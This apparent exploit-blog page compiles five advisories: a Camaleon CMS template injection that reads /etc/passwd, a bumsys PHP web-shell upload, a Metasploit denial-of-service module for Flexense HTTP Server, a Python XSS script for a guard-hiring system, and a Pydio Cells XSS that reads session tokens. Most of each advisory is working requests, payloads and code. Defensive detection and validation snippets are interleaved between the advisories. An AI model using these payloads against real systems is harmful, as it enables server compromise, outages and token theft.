Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Exploit Author: PARAG BAGUL
CVE: CVE-2023-30145

## Description
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the formats parameter.

## Affected Component
All versions below 2.7.0 are affected.

## Author
Parag Bagul

## Steps to Reproduce
1. Open the target URL: `https://target.com/admin/media/upload`
2. Upload any file and intercept the request.
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
4. Check the response. It should contain the result of `7*7` (49) in place of the template tag, e.g. the message "File format not allowed (dqopi49vuuvm)".

## Detection

### Request

POST /admin/media/upload?actions=false HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/profile/edit
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------327175120238370517612522354688
Content-Length: 1200
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="media_formats"

image
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="folder"

/
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------327175120238370517612522354688--

### Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: cookie
Content-Length: 41

File format not allowed (test49test)

## Exploitation

To execute arbitrary Ruby code on the server (here, reading `/etc/passwd`), use a payload such as:
testqopi<%= File.open('/etc/passwd').read %>fdtest

### Request

POST /admin/media/upload?actions=true HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/media
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------104219633614133026962934729021
Content-Length: 1237
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="versions"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="thumb_size"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="formats"

dqopi<%= File.open('/etc/passwd').read %>fdfdsf
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="media_formats"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="dimension"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="private"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="folder"

/
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------104219633614133026962934729021--

### Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Set-Cookie: cookie
Content-Length: 1816

File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
fdfdsf)
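The request-side check a defender can run on upload traffic before it reaches the application, added here as an example (it is not part of the advisory and not Camaleon CMS code): a small multipart/form-data parser pulls out every field, a pattern matcher flags template delimiters in field values, and a regression check for the fix confirms that the error message echoes the submitted value unchanged (an echoed `test49test` for a submitted `test<%= 7*7 %>test` means the value was rendered). The sample body is constructed from the detection request above; `parse_multipart`, `find_template_injection` and `template_was_evaluated` are this example's own names.

```python
import re

# Constructed sample: the multipart body of the detection request above, reduced to
# three parts (boundary and field names copied from the advisory).
BOUNDARY = b"---------------------------327175120238370517612522354688"
SAMPLE_BODY = b"\r\n".join([
    b"--" + BOUNDARY,
    b'Content-Disposition: form-data; name="file_upload"; filename="test.txt"',
    b"Content-Type: text/plain",
    b"",
    b"test",
    b"--" + BOUNDARY,
    b'Content-Disposition: form-data; name="formats"',
    b"",
    b"test<%= 7*7 %>test",
    b"--" + BOUNDARY,
    b'Content-Disposition: form-data; name="media_formats"',
    b"",
    b"image",
    b"--" + BOUNDARY + b"--",
    b"",
])

# ERB/EJS tags as used in the advisory, plus the Jinja/Twig and ${} families so the
# same rule covers other server-side template engines.
TEMPLATE_TAG = re.compile(rb"<%[=-]?.*?%>|\{\{.*?\}\}|\$\{.*?\}", re.S)
# "; name=" so that filename="..." in the same header is not picked up
FIELD_NAME = re.compile(rb';\s*name="([^"]*)"')
REFLECTION = re.compile(r"File format not allowed \((.*)\)", re.S)


def parse_multipart(body, boundary):
    """Return {field_name: raw_value_bytes} for a multipart/form-data body."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter reached
            break
        headers, _, value = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = FIELD_NAME.search(headers)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def find_template_injection(fields):
    """Return (field_name, matched_tag) for every field value carrying template syntax."""
    hits = []
    for name, value in fields.items():
        for tag in TEMPLATE_TAG.findall(value):
            hits.append((name, tag.decode("utf-8", "replace")))
    return hits


def reflected_value(response_body):
    """Extract the value echoed inside 'File format not allowed (...)', or None."""
    match = REFLECTION.search(response_body)
    return match.group(1) if match else None


def template_was_evaluated(submitted, response_body):
    """Regression check for the fix: a safe server echoes the submitted value byte for
    byte. Any difference means the value went through the template engine."""
    echoed = reflected_value(response_body)
    return echoed is not None and echoed != submitted


if __name__ == "__main__":
    fields = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print(find_template_injection(fields))
    print(template_was_evaluated(fields["formats"].decode(),
                                 "File format not allowed (test49test)"))
```

The detector is a stop-gap at the edge; the real fix is in the application, which must build the error message with the user value treated as data (string formatting) rather than interpolating it into a template that is then rendered.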
            
Exploit Title: unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455


================================
Steps_TO_Reproduce
================================
- Navigate to this URL: https://demo.bumsys.org/settings/shop-list/
- Click on the action button to edit the profile
- Click on the select logo button to upload the image
- Intercept the POST request and make the changes shown below.

================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

 test 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>


====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>


====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ
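The server-side validation that would have rejected the request above (a `.php` filename declared as `image/png` with a PHP body), added here as an example that is neither bumsys code nor part of the advisory; the same check applies to the Faculty Evaluation System upload further down this page, whose endpoint additionally lacks authentication, a separate control this example does not cover. Every check has to pass: one extension from an allowlist, a declared Content-Type that matches that extension, magic bytes that match it too, and no PHP open tag anywhere in the data; the stored name is chosen by the server. The three sample uploads are constructed; `validate_upload` and `storage_name` are this example's own names.

```python
import os
import re
import secrets

# Extension allowlist for a logo/avatar upload: extension -> (expected Content-Type, magic bytes)
ALLOWED_IMAGES = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif": ("image/gif", b"GIF8"),
}
# "<?php" and the short echo tag "<?="; a bare "<?" would also hit "<?xml" in SVG/XML
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.I)

# Constructed samples: the advisory's upload, a minimal real PNG, and a PNG/PHP polyglot
WEBSHELL_UPLOAD = ("profile picture.php", "image/png", b"<?php echo system($_REQUEST['dx']); ?>")
VALID_PNG = ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
POLYGLOT = ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>")


def validate_upload(filename, declared_type, data, allowed=ALLOWED_IMAGES):
    """Return (accepted, reason). The client-declared Content-Type and the filename
    are never trusted on their own; each check narrows what is accepted."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension expected"      # blocks a.php.png and .htaccess
    ext = parts[1]
    if ext not in allowed:
        return False, f"extension .{ext} not in allowlist"
    expected_type, magic = allowed[ext]
    if declared_type.split(";")[0].strip().lower() != expected_type:
        return False, f"Content-Type {declared_type} does not match .{ext}"
    if not data.startswith(magic):
        return False, "content does not start with the expected image signature"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random stem plus the (already validated) extension, so no
    user-controlled text reaches the filesystem or the web root."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"
```

Store the result outside the document root or in a directory where the web server has script execution disabled; the polyglot case shows why the signature check alone is not enough when the upload directory can execute PHP.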
            
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Flexense HTTP Server Denial Of Service',
      'Description'    => %q{
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
        The vulnerability is caused by a user-mode write access violation and can be triggered by
        rapidly sending a variety of HTTP requests with long HTTP header values.

        Multiple Flexense applications that use Flexense HTTP server 10.6.24 and below are reportedly vulnerable.
      },
      'Author'         => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))

    register_options(
      [
        Opt::RPORT(80),
        # Numeric options are OptInt, not OptString: with OptString the datastore value is a
        # String and the `count == PacketCount` comparison in run never becomes true
        OptInt.new('PacketCount', [ true, 'The number of packets to be sent (Recommended: above 1725)', 1725 ]),
        OptInt.new('PacketSize',  [ true, 'The number of bytes in the Accept header (Recommended: 4088-5090)', rand(4088..5090) ])
      ])
  end

  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end

  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    max_packets = datastore['PacketCount'].to_i
    print_status("Starting with packets of #{size}-byte strings")

    count = 0
    loop do
      # Each request has a random path and an Accept header padded to PacketSize bytes
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: " + ('A' * size) + "\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        break if count == max_packets
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination!  Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout!  Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset!  Continuing...')
      rescue ::Rex::ConnectionRefused
        # The server no longer accepts connections: the crash has happened
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end
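What a defender would look for in front of a server like this, added as an example that is not part of the module or of Flexense: a parser that flags header values beyond a size limit, and a sliding-window counter that flags any source sending a burst of such requests, which is exactly the pattern the module's description gives (many requests, long header values, sent rapidly). The two requests and the event stream are constructed; the 4 KiB limit is an assumption (the order of magnitude reverse proxies allow per header line; the module's trigger sizes of 4088-5090 bytes sit at that boundary); `oversized_headers` and `flag_sources` are this example's own names.

```python
from collections import defaultdict

# Constructed requests in the shape the module builds: one ordinary, one with an
# Accept header padded far beyond any legitimate value.
BENIGN_REQUEST = b"".join([
    b"GET /index.html HTTP/1.1\r\n",
    b"Host: 127.0.0.1\r\n",
    b"Accept: text/html,application/xhtml+xml\r\n",
    b"\r\n",
])
PADDED_REQUEST = b"".join([
    b"GET /xyzzy HTTP/1.1\r\n",
    b"Host: 127.0.0.1\r\n",
    b"Accept: " + b"A" * 4500 + b"\r\n",
    b"\r\n",
])

# Assumed limit: 4 KiB per header value
MAX_HEADER_VALUE = 4096


def oversized_headers(raw_request, limit=MAX_HEADER_VALUE):
    """Return [(header_name, value_length)] for every header value longer than limit."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    findings = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        length = len(value.strip())
        if sep and length > limit:
            findings.append((name.decode("ascii", "replace"), length))
    return findings


def flag_sources(events, threshold, window_seconds):
    """events: iterable of (timestamp, source_ip, raw_request). Return the sources that
    sent more than `threshold` oversized-header requests inside any window."""
    per_source = defaultdict(list)
    for ts, src, raw in sorted(events, key=lambda e: e[0]):
        if oversized_headers(raw):
            per_source[src].append(ts)
    flagged = set()
    for src, stamps in per_source.items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(src)
                break
    return flagged


# Constructed event stream: one host hammering padded requests, one normal client.
SAMPLE_EVENTS = ([(0.2 * i, "203.0.113.7", PADDED_REQUEST) for i in range(6)]
                 + [(0.5 * i, "198.51.100.4", BENIGN_REQUEST) for i in range(6)])
```

A reverse proxy with a per-header size limit in front of the Flexense service rejects the padded requests before they reach the vulnerable parser; the detector above is the alerting side of the same control.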
            
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS 
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527

#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php

#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md


import requests
import re
from colorama import Fore

print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW + "######################################################################" + Fore.RESET)

print()
print(Fore.RED + "NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py" + Fore.RESET)
print()


# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)

Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
}

# A SESSION KEEPS THE PHPSESSID COOKIE SET BY THE LOGIN PAGE FOR THE FOLLOWING REQUESTS
# (A HARD-CODED Cookie HEADER ONLY WORKS FOR THE ONE SESSION IT WAS COPIED FROM)
session = requests.Session()
response = session.post(Website_url, headers=headers, data=Admin_login_credentials)
if response.status_code == 200:
    location = re.findall(r'document\.location\s*=\s*\'(.*?)\'', response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)
        print(Fore.GREEN + "> Popup:" + Fore.RESET, location)
    else:
        print(Fore.GREEN + "> document.location not found" + Fore.RESET)
else:
    # THE STATUS CODE IS AN INT: CONVERT IT BEFORE CONCATENATING WITH THE COLOUR RESET STRING
    print(Fore.GREEN + "> Error:", str(response.status_code) + Fore.RESET)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)


# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url = "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE

# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
    "mobilenumber": "8979555558",
    "email": "admin@gmail.com",
    "submit": "",
}

# SENDING THE PAYLOAD WITH A POST REQUEST ON THE AUTHENTICATED SESSION
response = session.post(Website_url, headers=headers, data=payload)

print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : " + Fore.RESET)
    print(Fore.GREEN + ">" + Fore.RESET, scripts)
            
Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
Advisory Status: published
CVE: CVE-2023-32751
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

When a file named "xss.html" is downloaded in the Pydio Cells web application, a
download URL similar to the following is generated:

https://example.com/io/xss/xss.html
  ?AWSAccessKeyId=gateway
  &Expires=1682495748
  &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
  &response-content-disposition=attachment%3B%20filename%3Dxss.html
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

The URL is akin to a presigned URL as used by the Amazon S3 service. It
contains the URL parameter "response-content-disposition" which is set
to "attachment" causing the response to contain a "Content-Disposition"
header with that value. Therefore, the browser downloads the file
instead of interpreting it. The URL also contains a signature and expiry
timestamp, which are checked by the backend. Unlike a presigned URL as used
by S3, the URL also contains the parameter "pydio_jwt" with the JWT of
the user for authentication. Furthermore, the access key with the ID
"gateway" is referenced, which can be found in the JavaScript sources of
Pydio Cells together with the secret:

------------------------------------------------------------------------
_awsSdk.default.config.update({
  accessKeyId: 'gateway',
  secretAccessKey: 'gatewaysecret',
  s3ForcePathStyle: !0,
  httpOptions: {
    timeout: PydioApi.getMultipartUploadTimeout()
  }
});
------------------------------------------------------------------------

With this information it is possible to change the URL parameter
"response-content-disposition" to the value "inline" and then calculate
a valid signature for the resulting URL. Furthermore, the content type of
the response can be changed to "text/html" by also adding the URL
parameter "response-content-type" with that value. This would result in
a URL like the following for the previously shown example URL:

https://example.com/io/xss/xss.html?
  AWSAccessKeyId=gateway
  &Expires=1682495668
  &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
  &response-content-disposition=inline
  &response-content-type=text%2Fhtml
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

Upon opening the URL in a browser, the HTML included in the file is
interpreted and any JavaScript code is run.

Proof of Concept
================

Upload an HTML file to an arbitrary location of a Pydio Cells instance,
for example with the following contents:

------------------------------------------------------------------------
<html>
  <body>
    <h1>Cross-Site Scriping</h1>
    <script>
      let token = JSON.parse(localStorage.token4).AccessToken;
      alert(token);
    </script>
  </body>
</html>
------------------------------------------------------------------------

The contained JavaScript code reads the JWT access token for Pydio Cells
from the browser's local storage object and opens a message box. Instead
of just displaying the JWT, it could also be sent to an attacker. The
following JavaScript function can then be run within the browser's
developer console to generate a presigned URL for the HTML file:

------------------------------------------------------------------------
async function getPresignedURL(path) {
  let client = PydioApi.getClient();
  let node = new AjxpNode(path);
  let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"};
  let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);

  return url;
}

await getPresignedURL("xss/xss.html");
------------------------------------------------------------------------

The code has to be run in the context of Pydio Cells while being logged in.
If the resulting URL is opened in a browser, the JavaScript code
contained in the HTML file is run. If the attack is conducted in the
described way, the JWT of the attacker is exposed through the URL.
However, this can be circumvented by first generating a public URL
for the file and then constructing the presigned URL based on the
resulting download URL.
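The two sides of the defence for the download path described above and in the proof of concept, added as an example that is neither Pydio Cells code nor part of the advisory: `audit_presigned_url` is the detection side, listing the response-override parameters that turn a download into an inline, script-capable document (and noting the bearer token in the URL), and `safe_download_headers` is the mitigation side, the headers a gateway should send for a user-uploaded file regardless of what the URL asks for. Both URLs are reconstructed from the advisory (JWT truncated as on the page); the function names and the set of "active" content types are this example's own choices.

```python
import os
from urllib.parse import urlparse, parse_qs

# Constructed from the two URLs above (JWT truncated exactly as in the advisory).
ORIGINAL_URL = ("https://example.com/io/xss/xss.html?AWSAccessKeyId=gateway&Expires=1682495748"
                "&Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D"
                "&response-content-disposition=attachment%3B%20filename%3Dxss.html"
                "&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]")
MODIFIED_URL = ("https://example.com/io/xss/xss.html?AWSAccessKeyId=gateway&Expires=1682495668"
                "&Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D"
                "&response-content-disposition=inline&response-content-type=text%2Fhtml"
                "&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]")

# Types a browser renders actively (script-capable) when served inline.
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml", "text/xml", "application/xml"}


def audit_presigned_url(url):
    """Detection side: list the risky response-* overrides carried by a download URL."""
    query = parse_qs(urlparse(url).query)
    findings = []
    disposition = query.get("response-content-disposition", ["attachment"])[0]
    if disposition.split(";")[0].strip().lower() != "attachment":
        findings.append("disposition override: " + disposition)
    ctype = query.get("response-content-type", [""])[0].split(";")[0].strip().lower()
    if ctype in ACTIVE_TYPES:
        findings.append("active content type override: " + ctype)
    if "pydio_jwt" in query:
        findings.append("bearer token carried in URL")
    return findings


def safe_download_headers(stored_type, filename):
    """Mitigation side: headers for serving a user-uploaded file. Active types are
    downgraded to octet-stream, the disposition is always attachment, MIME sniffing is
    forbidden, and a sandbox CSP neutralises scripts even if a browser renders the body."""
    ctype = stored_type.split(";")[0].strip().lower()
    if ctype in ACTIVE_TYPES:
        ctype = "application/octet-stream"
    # keep the filename parameter free of quotes and line breaks (header injection)
    safe_name = os.path.basename(filename)
    for bad in ('"', "\r", "\n"):
        safe_name = safe_name.replace(bad, "")
    return {
        "Content-Type": ctype,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }
```

Serving user content from a separate origin (so a rendered file cannot read the application's `localStorage`) is the structural complement to these headers.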


Workaround
==========

No workaround known.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

Attackers that can upload files to a Pydio Cells instance can construct
URLs that execute arbitrary JavaScript code in the context of Pydio Cells
upon opening. This could for example be used to steal the authentication
tokens of users opening the URL. It is likely that such an attack
succeeds, since sharing URLs to files hosted using Pydio Cells is a
common use case of the application. Therefore, the vulnerability is
estimated to pose a high risk.


Timeline
========

